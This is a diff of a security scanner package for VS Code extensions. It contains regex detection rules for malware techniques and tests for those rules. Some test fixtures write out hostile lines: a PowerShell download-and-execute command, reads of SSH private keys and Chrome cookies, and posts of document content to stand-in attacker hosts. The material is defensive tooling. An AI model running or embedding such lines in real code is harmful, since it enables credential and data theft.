@trailofbits/vsix-audit 0.1.0

package/dist/scanner/checks/patterns.js

@@ -0,0 +1,251 @@
+import { isScannable, SCANNABLE_EXTENSIONS_PATTERN } from "../constants.js";
+import { findLineNumberByIndex } from "../utils.js";
+const PATTERNS = [
+    {
+        id: "POWERSHELL_HIDDEN",
+        title: "Hidden PowerShell execution",
+        description: "Code executes PowerShell with hidden window. This is a common malware technique to run commands invisibly.",
+        pattern: /powershell[^;]*-WindowStyle\s+Hidden/gi,
+        severity: "critical",
+    },
+    {
+        id: "POWERSHELL_DOWNLOAD_EXEC",
+        title: "PowerShell download and execute",
+        description: "Code uses PowerShell to download and execute remote content (IEX/Invoke-Expression with IRM/Invoke-RestMethod or IWR/Invoke-WebRequest).",
+        pattern: /(?:irm|iwr|invoke-(?:webrequest|restmethod))[^|]*\|\s*(?:iex|invoke-expression)/gi,
+        severity: "critical",
+    },
+    {
+        id: "DISCORD_WEBHOOK",
+        title: "Discord webhook exfiltration",
+        description: "Code contains Discord webhook URL. This is commonly used to exfiltrate stolen data to attacker-controlled Discord channels.",
+        pattern: /discord\.com\/api\/webhooks\/\d+\/[a-zA-Z0-9_-]+/g,
+        severity: "high",
+    },
+    {
+        id: "DISCORD_WEBHOOK_PARTIAL",
+        title: "Discord webhook URL pattern",
+        description: "Code references Discord webhook API. This is commonly used for data exfiltration.",
+        pattern: /discord\.com\/api\/webhooks/g,
+        severity: "high",
+    },
+    {
+        id: "SSH_KEY_ACCESS",
+        title: "SSH private key access",
+        description: "Code accesses SSH private key files. This could indicate credential theft, but is expected in SSH client extensions and remote development tools.",
+        pattern: /\.ssh\/id_(?:rsa|ed25519|ecdsa|dsa)/g,
+        severity: "high",
+        legitimateUses: ["SSH client extensions", "Remote development tools", "Git SSH authentication"],
+        redFlags: [
+            "Combined with network exfiltration",
+            "Obfuscated file access",
+            "Unexpected in theme/formatter",
+        ],
+    },
+    {
+        id: "SSH_KEY_GENERIC",
+        title: "SSH key file reference",
+        description: "Code references .ssh directory. Could indicate SSH credential access, but is common in SSH extensions, remote development tools, and documentation.",
+        pattern: /\.ssh\//g,
+        severity: "medium",
+        legitimateUses: [
+            "Remote SSH extensions",
+            "SSH config editors",
+            "Git SSH operations",
+            "Documentation",
+        ],
+        redFlags: ["Combined with exfiltration patterns", "Obfuscated access"],
+    },
+    {
+        id: "EVAL_ATOB",
+        title: "Eval with base64 decode",
+        description: "Code uses eval with atob (base64 decode). This is a common obfuscation technique to hide malicious code.",
+        pattern: /(?:atob\s*\([^)]+\)[^;]*eval|eval\s*\([^)]*atob)/gi,
+        severity: "high",
+    },
+    {
+        id: "ATOB_SUSPICIOUS",
+        title: "Base64 decoding in suspicious context",
+        description: "Code uses atob() to decode base64. While not always malicious, this is commonly used to obfuscate payloads.",
+        pattern: /atob\s*\(\s*["'`][A-Za-z0-9+/=]{50,}["'`]\s*\)/g,
+        severity: "medium",
+    },
+    {
+        id: "CHILD_PROCESS_EXEC",
+        title: "Command execution via child_process",
+        description: "Code uses child_process.exec or execSync. Common in extensions that run CLI tools (git, compilers, linters, debuggers). Review the commands being executed.",
+        pattern: /(?:child_process|cp)['"]?\s*\)?\s*\.?\s*(?:exec|execSync|spawn|spawnSync)\s*\(/g,
+        severity: "medium",
+        legitimateUses: ["Git operations", "Build tools", "Linters", "Debuggers", "Language servers"],
+        redFlags: [
+            "PowerShell with hidden window",
+            "Downloading remote scripts",
+            "Obfuscated commands",
+        ],
+    },
+    {
+        id: "REQUIRE_CHILD_PROCESS",
+        title: "child_process module import",
+        description: "Code imports child_process module which enables command execution. This is common in extensions that integrate with CLI tools.",
+        pattern: /require\s*\(\s*["'`]child_process["'`]\s*\)/g,
+        severity: "low",
+        legitimateUses: [
+            "Git integration",
+            "Build systems",
+            "Formatters",
+            "Debuggers",
+            "Terminal tools",
+        ],
+        redFlags: ["No obvious CLI tool integration", "Combined with obfuscation"],
+    },
+    {
+        id: "NATIVE_NODE_FILE",
+        title: "Native .node binary",
+        description: "Extension contains native .node binary reference. Native addons can execute code outside the Node.js sandbox. Common in debuggers, language servers, and performance-critical tools.",
+        pattern: /\.node['"`]/g,
+        severity: "medium",
+        legitimateUses: [
+            "Debugger extensions",
+            "Language servers (LSP)",
+            "Performance tools",
+            "Native code integration",
+        ],
+        redFlags: [
+            "Unknown/obfuscated binary",
+            "No clear native functionality needed",
+            "Binary from untrusted source",
+        ],
+    },
+    {
+        id: "BROWSER_STORAGE",
+        title: "Browser data access",
+        description: "Code accesses browser storage paths (Chrome, Firefox, etc.). This could indicate credential or cookie theft.",
+        pattern: /(?:AppData|Application Support).*(?:Google\\Chrome|Mozilla\\Firefox|BraveSoftware)|Local Storage|leveldb|Cookies/gi,
+        severity: "high",
+    },
+    {
+        id: "CRYPTO_WALLET",
+        title: "Cryptocurrency wallet access",
+        description: "Code references cryptocurrency wallet paths or extensions. Could indicate crypto theft, but is expected in blockchain/Solidity development tools and security audit extensions.",
+        // Removed 'atomic' (too generic - matches Atomic Design, atomic operations, etc.)
+        // Removed '.wallet' (too generic - matches many non-crypto uses)
+        pattern: /(?:metamask|phantom|solflare|exodus|trust.*wallet|wallet\.dat|\.ethereum|\.bitcoin)/gi,
+        severity: "high",
+        legitimateUses: [
+            "Solidity development tools",
+            "Blockchain debuggers",
+            "Security audit extensions",
+            "Web3 development",
+        ],
+        redFlags: [
+            "File read operations on wallet paths",
+            "Network exfiltration of wallet data",
+            "Unexpected in non-blockchain extension",
+        ],
+    },
+    // Removed KEYLOGGER_PATTERN - too noisy, triggers on standard VS Code APIs
+    // (onDidChangeTextDocument is used by virtually all extensions)
+    // Behavioral check BEHAVIOR_KEYLOGGER handles this with multi-stage detection
+    {
+        id: "NETWORK_EXFIL",
+        title: "Network data transmission",
+        description: "Code makes HTTP requests with file or document content. Could indicate data exfiltration.",
+        pattern: /(?:axios|fetch|http|request)\s*\.\s*(?:post|put)\s*\([^)]*(?:getText|readFile|content)/gi,
+        severity: "medium",
+    },
+    {
+        id: "OBFUSCATED_CODE",
+        title: "Potentially obfuscated code",
+        description: "Code contains patterns typical of obfuscation (long hex strings, unusual variable names).",
+        pattern: /(?:_0x[a-f0-9]{4,}|\\x[a-f0-9]{2}){5,}/gi,
+        severity: "medium",
+    },
+    {
+        id: "VERCEL_APP",
+        title: "Vercel app domain",
+        description: "Code references a Vercel app domain. While Vercel is legitimate, it's commonly abused for C2 infrastructure by malware.",
+        pattern: /[a-z0-9-]+\.vercel\.app/gi,
+        severity: "medium",
+    },
+    {
+        id: "PYTHONANYWHERE",
+        title: "PythonAnywhere domain",
+        description: "Code references a PythonAnywhere domain. This free hosting service is commonly abused for data exfiltration.",
+        pattern: /[a-z0-9-]+\.pythonanywhere\.com/gi,
+        severity: "medium",
+    },
+];
+export function checkPatterns(contents) {
+    const findings = [];
+    const seenFindings = new Set();
+    for (const [filename, buffer] of contents.files) {
+        if (!isScannable(filename, SCANNABLE_EXTENSIONS_PATTERN))
+            continue;
+        const content = buffer.toString("utf8");
+        for (const rule of PATTERNS) {
+            const regex = new RegExp(rule.pattern.source, rule.pattern.flags);
+            let match;
+            while ((match = regex.exec(content)) !== null) {
+                const key = `${rule.id}:${filename}:${match[0]}`;
+                if (seenFindings.has(key))
+                    continue;
+                seenFindings.add(key);
+                findings.push({
+                    id: rule.id,
+                    title: rule.title,
+                    description: rule.description,
+                    severity: rule.severity,
+                    category: "pattern",
+                    location: {
+                        file: filename,
+                        line: findLineNumberByIndex(content, match.index),
+                    },
+                    metadata: {
+                        matched: match[0].slice(0, 100),
+                        ...(rule.legitimateUses && { legitimateUses: rule.legitimateUses }),
+                        ...(rule.redFlags && { redFlags: rule.redFlags }),
+                    },
+                });
+            }
+        }
+    }
+    return findings;
+}
+export function checkNativeFiles(contents) {
+    const findings = [];
+    const nativeExtensions = [".node", ".dll", ".dylib", ".so", ".exe"];
+    for (const filename of contents.files.keys()) {
+        const ext = filename.slice(filename.lastIndexOf(".")).toLowerCase();
+        if (nativeExtensions.includes(ext)) {
+            findings.push({
+                id: "NATIVE_BINARY",
+                title: "Native binary file in extension",
+                description: `Extension contains native binary "${filename}". Native code can execute outside the Node.js sandbox. Common in debuggers, language servers, and performance-critical tools.`,
+                severity: "high",
+                category: "pattern",
+                location: {
+                    file: filename,
+                },
+                metadata: {
+                    extension: ext,
+                    legitimateUses: [
+                        "Debugger extensions (LLDB, GDB)",
+                        "Language servers",
+                        "Performance tools",
+                        "Syntax highlighting with tree-sitter",
+                    ],
+                    redFlags: [
+                        "Unknown/obfuscated binary",
+                        "No clear native functionality needed",
+                        "Binary fetched from network",
+                    ],
+                },
+            });
+        }
+    }
+    return findings;
+}
+export function checkAllPatterns(contents) {
+    return [...checkPatterns(contents), ...checkNativeFiles(contents)];
+}
+//# sourceMappingURL=patterns.js.map

package/dist/scanner/checks/patterns.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"patterns.js","sourceRoot":"","sources":["../../../src/scanner/checks/patterns.ts"],"names":[],"mappings":"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"}

package/dist/scanner/checks/patterns.test.d.ts

@@ -0,0 +1,2 @@
+export {};
+//# sourceMappingURL=patterns.test.d.ts.map

package/dist/scanner/checks/patterns.test.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"patterns.test.d.ts","sourceRoot":"","sources":["../../../src/scanner/checks/patterns.test.ts"],"names":[],"mappings":""}

package/dist/scanner/checks/patterns.test.js

@@ -0,0 +1,147 @@
+import { describe, expect, it } from "vitest";
+import { checkAllPatterns, checkPatterns } from "./patterns.js";
+function makeContents(files) {
+    const manifest = {
+        name: "test",
+        publisher: "test",
+        version: "1.0.0",
+    };
+    const fileMap = new Map();
+    for (const [name, content] of Object.entries(files)) {
+        fileMap.set(name, Buffer.from(content));
+    }
+    return {
+        manifest,
+        files: fileMap,
+        basePath: "/test",
+    };
+}
+describe("checkPatterns", () => {
+    it("detects hidden PowerShell execution", () => {
+        const contents = makeContents({
+            "extension.js": `exec('powershell -WindowStyle Hidden -Command "test"')`,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "POWERSHELL_HIDDEN")).toBe(true);
+    });
+    it("detects PowerShell download and execute", () => {
+        const contents = makeContents({
+            "extension.js": `exec('powershell irm https://example.com/payload | iex')`,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "POWERSHELL_DOWNLOAD_EXEC")).toBe(true);
+    });
+    it("detects Discord webhook URLs", () => {
+        const contents = makeContents({
+            "extension.js": `const webhook = 'https://discord.com/api/webhooks/123/abc-def'`,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "DISCORD_WEBHOOK")).toBe(true);
+    });
+    it("detects SSH key access", () => {
+        const contents = makeContents({
+            "extension.js": `const key = fs.readFileSync('.ssh/id_rsa')`,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "SSH_KEY_ACCESS")).toBe(true);
+    });
+    it("detects child_process exec calls", () => {
+        const contents = makeContents({
+            "extension.js": `const { exec } = require('child_process'); exec('whoami')`,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "REQUIRE_CHILD_PROCESS")).toBe(true);
+    });
+    it("detects Vercel app domains", () => {
+        const contents = makeContents({
+            "extension.js": `fetch('https://suspicious-payload.vercel.app/data')`,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "VERCEL_APP")).toBe(true);
+    });
+    it("does not flag clean code", () => {
+        const contents = makeContents({
+            "extension.js": `
+        const vscode = require('vscode');
+        function activate(context) {
+          console.log('Extension activated');
+        }
+        module.exports = { activate };
+      `,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.filter((f) => f.severity === "critical" || f.severity === "high")).toHaveLength(0);
+    });
+});
+describe("checkPatterns - high-risk patterns", () => {
+    it("detects cryptocurrency wallet access", () => {
+        const contents = makeContents({
+            "extension.js": `
+        const walletPath = process.env.APPDATA + '/MetaMask';
+        const data = fs.readFileSync(walletPath);
+      `,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "CRYPTO_WALLET")).toBe(true);
+        expect(findings.find((f) => f.id === "CRYPTO_WALLET")?.severity).toBe("high");
+    });
+    it("detects phantom wallet reference", () => {
+        const contents = makeContents({
+            "extension.js": `const phantomWallet = require('phantom');`,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "CRYPTO_WALLET")).toBe(true);
+    });
+    // KEYLOGGER_PATTERN was removed from patterns.ts as it was too noisy
+    // (triggered on standard VS Code APIs like onDidChangeTextDocument).
+    // The behavioral check BEHAVIOR_KEYLOGGER in behavioral.ts now handles
+    // this with multi-stage detection (capture + store + exfiltrate).
+    it("detects network data exfiltration pattern", () => {
+        const contents = makeContents({
+            "extension.js": `
+        const content = document.getText();
+        axios.post('https://attacker.com/exfil', { data: content });
+      `,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "NETWORK_EXFIL")).toBe(true);
+    });
+    it("detects browser storage access", () => {
+        const contents = makeContents({
+            "extension.js": `
+        const chromePath = process.env.APPDATA + '/Google\\\\Chrome/User Data/Default/Cookies';
+        const cookies = fs.readFileSync(chromePath);
+      `,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "BROWSER_STORAGE")).toBe(true);
+    });
+    it("detects obfuscated code patterns", () => {
+        const contents = makeContents({
+            "extension.js": `
+        const _0x1234 = '\\x68\\x65\\x6c\\x6c\\x6f\\x77\\x6f\\x72\\x6c\\x64';
+        eval(_0x1234);
+      `,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "OBFUSCATED_CODE")).toBe(true);
+    });
+    it("detects PythonAnywhere exfiltration domain", () => {
+        const contents = makeContents({
+            "extension.js": `fetch('https://attacker123.pythonanywhere.com/receive')`,
+        });
+        const findings = checkPatterns(contents);
+        expect(findings.some((f) => f.id === "PYTHONANYWHERE")).toBe(true);
+    });
+});
+describe("checkAllPatterns", () => {
+    it("detects native binary files", () => {
+        const contents = makeContents({
+            "native.node": "binary content",
+            "lib.dll": "binary content",
+        });
+        const findings = checkAllPatterns(contents);
+        expect(findings.filter((f) => f.id === "NATIVE_BINARY")).toHaveLength(2);
+    });
+});
+//# sourceMappingURL=patterns.test.js.map

package/dist/scanner/checks/patterns.test.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"patterns.test.js","sourceRoot":"","sources":["../../../src/scanner/checks/patterns.test.ts"],"names":[],"mappings":"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